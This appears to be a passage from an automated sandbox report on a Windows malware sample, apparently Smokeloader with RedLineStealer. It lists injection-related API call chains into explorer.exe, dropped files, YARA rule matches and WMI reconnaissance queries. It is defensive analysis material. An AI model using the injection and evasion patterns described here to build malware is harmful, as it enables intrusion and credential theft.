                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401557
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_0040326C NtTerminateProcess,RtlInitUnicodeString,4_2_0040326C
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00403277 NtTerminateProcess,RtlInitUnicodeString,4_2_00403277
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_0040327D NtTerminateProcess,RtlInitUnicodeString,4_2_0040327D
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_004032C7 ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,4_2_004032C7
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014FE
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00403290 NtTerminateProcess,RtlInitUnicodeString,4_2_00403290
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,7_2_00403043
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014C4
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_00401508 NtAllocateVirtualMemory,7_2_00401508
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004014CF NtAllocateVirtualMemory,7_2_004014CF
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015D5
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004014DE NtAllocateVirtualMemory,7_2_004014DE
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015DF
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015E6
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015F2
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004014F5 NtAllocateVirtualMemory,7_2_004014F5
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004014F8 NtAllocateVirtualMemory,7_2_004014F8
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004014FB NtAllocateVirtualMemory,7_2_004014FB
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_00403043 RtlCreateUserThread,NtTerminateProcess,8_2_00403043
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004014C4
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_00401508 NtAllocateVirtualMemory,8_2_00401508
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004014CF NtAllocateVirtualMemory,8_2_004014CF
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015D5
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004014DE NtAllocateVirtualMemory,8_2_004014DE
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015DF
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015E6
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015F2
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004014F5 NtAllocateVirtualMemory,8_2_004014F5
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004014F8 NtAllocateVirtualMemory,8_2_004014F8
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004014FB NtAllocateVirtualMemory,8_2_004014FB
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C34B92 RtlMoveMemory,NtUnmapViewOfSection,11_2_00C34B92
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C333C3 NtQueryInformationFile,11_2_00C333C3
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C3349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,11_2_00C3349B
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C3342B NtQueryObject,NtQueryObject,RtlMoveMemory,11_2_00C3342B
                  Source: C:\Windows\explorer.exeCode function: 13_2_00D338B0 NtUnmapViewOfSection,13_2_00D338B0
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,14_2_00C21016
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C21A80 NtCreateSection,NtMapViewOfSection,14_2_00C21A80
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C21819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,14_2_00C21819
                  Source: C:\Windows\explorer.exeCode function: 15_2_0035355C NtUnmapViewOfSection,15_2_0035355C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00AD1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_00AD1016
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00AD1B26 NtCreateSection,NtMapViewOfSection,16_2_00AD1B26
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00AD18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_00AD18BF
                  Source: C:\Windows\explorer.exeCode function: 17_2_00E0370C NtUnmapViewOfSection,17_2_00E0370C
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00418C800_2_00418C80
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00418C804_2_00418C80
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004189C07_2_004189C0
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004189C08_2_004189C0
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B69AC89_2_00007FF780B69AC8
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B6DC089_2_00007FF780B6DC08
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B6A7749_2_00007FF780B6A774
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B6A51C9_2_00007FF780B6A51C
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B6213C9_2_00007FF780B6213C
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B6B4249_2_00007FF780B6B424
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B632209_2_00007FF780B63220
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_3_05DCCCF111_3_05DCCCF1
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_3_05DCCCF111_3_05DCCCF1
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_3_05DCCCF111_3_05DCCCF1
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_3_05DCCCF111_3_05DCCCF1
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C3219811_2_00C32198
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C3C2F911_2_00C3C2F9
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C4B35C11_2_00C4B35C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C8443811_2_00C84438
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C4B97E11_2_00C4B97E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C36E6A11_2_00C36E6A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C55F0811_2_00C55F08
                  Source: C:\Windows\explorer.exeCode function: 13_2_00D31E2013_2_00D31E20
                  Source: C:\Windows\explorer.exeCode function: 15_2_0035286015_2_00352860
                  Source: C:\Windows\explorer.exeCode function: 15_2_0035205415_2_00352054
                  Source: C:\Windows\explorer.exeCode function: 17_2_00E020F417_2_00E020F4
                  Source: C:\Windows\explorer.exeCode function: 17_2_00E02A0417_2_00E02A04
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_00406E8033_2_00406E80
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_00418C8033_2_00418C80
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_004084AD33_2_004084AD
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_004040B433_2_004040B4
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_00401D5E33_2_00401D5E
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_004073C433_2_004073C4
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_004097A133_2_004097A1
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_00406E8034_2_00406E80
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_004084AD34_2_004084AD
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_004040B434_2_004040B4
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_00401D5E34_2_00401D5E
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_004189C034_2_004189C0
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_004073C434_2_004073C4
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_004097A134_2_004097A1
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00C38801 appears 40 times
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00C37F70 appears 32 times
                  Source: OCYe9qcxiM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: OCYe9qcxiM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 4470.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: hehcrfb.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: fihcrfb.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@63/15@5/4
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_0079273A CreateToolhelp32Snapshot,Module32First,0_2_0079273A
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B67138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,9_2_00007FF780B67138
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hehcrfbJump to behavior
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4470.tmpJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: OCYe9qcxiM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;324&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;324&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;408&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;408&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;484&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;484&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;492&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;492&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;556&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;556&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;624&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;624&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;640&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;640&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;744&quot;::GetOwner
